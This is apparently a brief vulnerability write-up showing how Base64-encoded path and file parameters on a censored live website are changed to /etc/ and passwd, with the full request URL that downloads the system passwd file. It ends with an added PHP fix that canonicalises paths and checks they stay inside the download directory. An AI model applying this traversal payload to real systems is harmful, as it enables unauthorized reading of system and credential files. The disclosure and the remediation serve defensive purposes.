Remote File Download Vulnerability


While browsing I found this cool remote file download vulnerability. :)

http://www.censored.or.id/index.php?m=default&s=download&path=c3lzdGVtL21vZHVsZXMvYmVyaXRhL2ZpbGVzL2Rvd25sb2FkLw==&file=cHJlc2VudGF0aW9uX2ZpbmFsLnBwdA==&hs=true

If I open the link above, it will download a file for me. Now look at the path and file parameters. They are Base64-encoded.

path=c3lzdGVtL21vZHVsZXMvYmVyaXRhL2ZpbGVzL2Rvd25sb2FkLw==
file=cHJlc2VudGF0aW9uX2ZpbmFsLnBwdA==

Decoding both values, I got this:


path=system/modules/berita/files/download/
file=presentation_final.ppt

Now I know the path and the file name. What if I change them? Let's see.

path=L2V0Yy8=
file=cGFzc3dk

I changed the path value to /etc/ and the file value to passwd, encoding both as Base64 first.

http://www.censored.or.id/index.php?m=default&s=download&path=L2V0Yy8=&file=cGFzc3dk&hs=true

This modified link will download the passwd file from the system.



That's it.. :)


*Some links and values in this PoC have been censored/changed because this is a live website.
*The admin has been notified by email.
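
For developers fixing this class of bug, the following is an added example and not the affected site's code: a download resolver that decodes the two parameters, canonicalises the result and serves it only if it sits inside the download directory. The function name resolve_download(), the temporary demo tree and the choice of system/modules/berita/files/download as the only allowed directory are assumptions.

```php
<?php
// Added example, not the site's code. resolve_download() and the directory
// layout under $appRoot are assumptions made for illustration.
function resolve_download(string $appRoot, string $allowedDir, string $pathB64, string $fileB64): ?string
{
    // Base64 is an encoding, not a secret: decode strictly and treat the
    // result as untrusted user input.
    $dir  = base64_decode($pathB64, true);
    $file = base64_decode($fileB64, true);
    if ($dir === false || $file === false || $file === '') {
        return null;
    }
    // Reject NUL bytes and any file value that is not a bare file name.
    if (strpos($dir . $file, "\0") !== false || $file !== basename($file)) {
        return null;
    }
    // Canonicalise both paths; realpath() resolves "..", follows symlinks
    // and returns false when the target does not exist.
    $allowed = realpath($appRoot . '/' . $allowedDir);
    $target  = realpath($appRoot . '/' . $dir . '/' . $file);
    if ($allowed === false || $target === false || !is_file($target)) {
        return null;
    }
    // Containment check on the canonical path, with a trailing separator so
    // a sibling such as "download_old" cannot pass as "download".
    $prefix = $allowed . DIRECTORY_SEPARATOR;
    return strncmp($target, $prefix, strlen($prefix)) === 0 ? $target : null;
}

// Constructed demo tree in a temporary directory.
$appRoot    = sys_get_temp_dir() . '/dl_demo_' . bin2hex(random_bytes(4));
$allowedDir = 'system/modules/berita/files/download';
mkdir("$appRoot/$allowedDir", 0700, true);
file_put_contents("$appRoot/$allowedDir/presentation_final.ppt", 'demo');

// Parameter values taken from the two links in the write-up above.
$requests = [
    'original link' => ['c3lzdGVtL21vZHVsZXMvYmVyaXRhL2ZpbGVzL2Rvd25sb2FkLw==', 'cHJlc2VudGF0aW9uX2ZpbmFsLnBwdA=='],
    'modified link' => ['L2V0Yy8=', 'cGFzc3dk'],
];
foreach ($requests as $label => [$p, $f]) {
    $result = resolve_download($appRoot, $allowedDir, $p, $f);
    echo $label, ': ', $result === null ? 'rejected' : "serve $result", PHP_EOL;
}
```

A stricter design drops the path parameter entirely and maps an opaque file ID to a server-side record, so no client-supplied directory ever reaches the filesystem.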